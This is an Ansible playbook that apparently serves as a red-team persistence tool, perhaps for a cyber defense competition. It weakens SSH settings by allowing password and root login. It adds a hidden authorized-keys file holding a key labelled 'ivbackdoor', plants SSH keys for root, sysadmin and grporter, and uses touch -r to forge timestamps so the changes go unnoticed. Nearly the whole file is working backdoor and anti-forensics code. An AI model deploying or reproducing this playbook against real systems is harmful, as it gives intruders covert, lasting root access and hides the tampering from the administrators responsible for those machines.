- name: ssh keys place
  hosts: linux
  become: true
  #become_method: enable
  ignore_errors: true
  tasks:
    - name: Allow password-based login and permit root login
      lineinfile:
        path: /etc/ssh/sshd_config
        regexp: '^PasswordAuthentication .*'
        line: 'PasswordAuthentication yes'

    - name: Permit root login
      lineinfile:
        path: /etc/ssh/sshd_config
        regexp: '^#PermitRootLogin .*'
        line: 'PermitRootLogin yes'

    - name: Add /etc/sshd/iv as a valid location for authorized keys
      lineinfile:
        path: /etc/ssh/sshd_config
        regexp: '^.*AuthorizedKeysFile.*$'
        line: 'AuthorizedKeysFile /etc/ssh/iv /root/.ssh/authorized_keys /home/%u/.ssh/authorized_keys'

    - name: Write the ivbackdoor pubkey to /etc/ssh/iv
      copy:
        content: |
          ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII8MC+aXwkJNbcvu5aIQ/iXcvcvwl9y3eYE+TntYvhBc scoring@ccdc
        dest: /etc/ssh/iv
        owner: root
        group: root
        mode: '0644'

    - name: Modify timestamp of iv to blend in 
      ansible.legacy.shell: |
          touch -r /etc/ssh/moduli /etc/ssh/iv
      args:
        executable: /bin/bash

    - name: Add ssh key to root's authorized_keys file
      ansible.legacy.shell: |
        if ! test -d /root/.ssh; then
            mkdir /root/.ssh
        fi
        if ! test -f /root/.ssh/authorized_keys || ! grep -q kQgUxh36 /root/.ssh/authorized_keys; then
          echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILINPfZ8GuoF3Y+ge21PAwh42X+tcO+75py4kQgUXh36 root' >> /root/.ssh/authorized_keys
          chown root.root /root/.ssh/authorized_keys 
          chmod 600 /root/.ssh/authorized_keys
          touch -r /root/.bashrc /root/.ssh/authorized_keys 
        fi
      args:
        executable: /bin/bash

    - name: Add ssh key to sysadmin (if exists)
      ansible.legacy.shell: |
        if test -d /home/sysadmin; then
          if ! test -d /home/sysadmin/.ssh/ || ! test -d /home/sysadmin/.ssh/authorized_keys; then
            mkdir /home/sysadmin/.ssh
            chown sysadmin.sysadmin /home/sysadmin/.ssh
            echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBNBv5fwG83k6HnDqFmUlnaagIh2HUP+jruIIVhqQnTE sysadmin' >> /home/sysadmin/.ssh/authorized_keys
            chown sysadmin.sysadmin /home/sysadmin/.ssh/authorized_keys 
            chmod 600 /home/sysadmin/.ssh/authorized_keys
            touch -r /home/sysadmin/.bashrc /home/sysadmin/.ssh 
            touch -r /home/sysadmin/.bashrc /home/sysadmin/.ssh/authorized_keys 
          fi
        fi
      args:
        executable: /bin/bash

    - name: Add ssh key to grporter (if exists, just for Fed21)
      ansible.legacy.shell: |
        if test -d /home/grporter; then
          if ! test -d /home/grporter/.ssh/ || ! test -d /home/grporter/.ssh/authorized_keys; then
            mkdir /home/grporter/.ssh
            chown grporter.grporter /home/grporter/.ssh
            echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBNBv5fwG83k6HnDqFmUlnaagIh2HUP+jruIIVhqQnTE grporter' >> /home/grporter/.ssh/authorized_keys
            chown grporter.grporter /home/grporter/.ssh/authorized_keys 
            chmod 600 /home/grporter/.ssh/authorized_keys
            touch -r /home/grporter/.bashrc /home/grporter/.ssh 
            touch -r /home/grporter/.bashrc /home/grporter/.ssh/authorized_keys 
          fi
        fi
      args:
        executable: /bin/bash

    - name: Restart ssh service
      service:
        name: sshd
        state: restarted
      when: ansible_service_mgr == 'systemd'
